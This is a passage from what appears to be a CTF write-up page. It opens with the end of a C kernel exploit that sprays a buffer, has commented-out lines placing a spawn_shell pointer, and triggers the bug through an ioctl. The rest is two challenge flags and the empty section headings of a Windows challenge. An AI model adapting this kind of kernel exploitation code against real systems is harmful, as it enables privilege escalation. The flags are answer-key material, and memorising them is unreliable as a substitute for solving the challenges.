    // ((u64 *)buffer)[0x84] = (u64)spawn_shell;
    // ((u64 *)buffer)[0x85] = 0x20001000;

    for(int i = 0; i < sizeof(buffer)/0x8; i++) {
        if (i == 0x83 ) continue;
        // if (i == 0x8d || i == 0x85 ) continue;
        if (((u64 *)buffer)[i] == 0x0) {
            ((u64 *)buffer)[i] = EGG + i;
        }
    }

    ioctl_set_buffer(buffer, 1024+0x200);

    _pause_("end of exploit...");
}

CTFs/Scripts/pwn/kernelspace/libpwn.c at main · HyggeHalcyon/CTFsGitHub

Flag: ITSEC{4652e94e001f0d2c9c5caaf9f617a146}

dame_un_que

Description

Analysis

Exploitation

Flag: ITSEC{Sorry_it_had_to_be_windows_again,_but_I_read_too_much_STARLABS_writeups_recently_honestly_kinda_felt_bad}

PreviousAlfa Surfing NextCyber Breaker Competition Quals

Last updated 1 day ago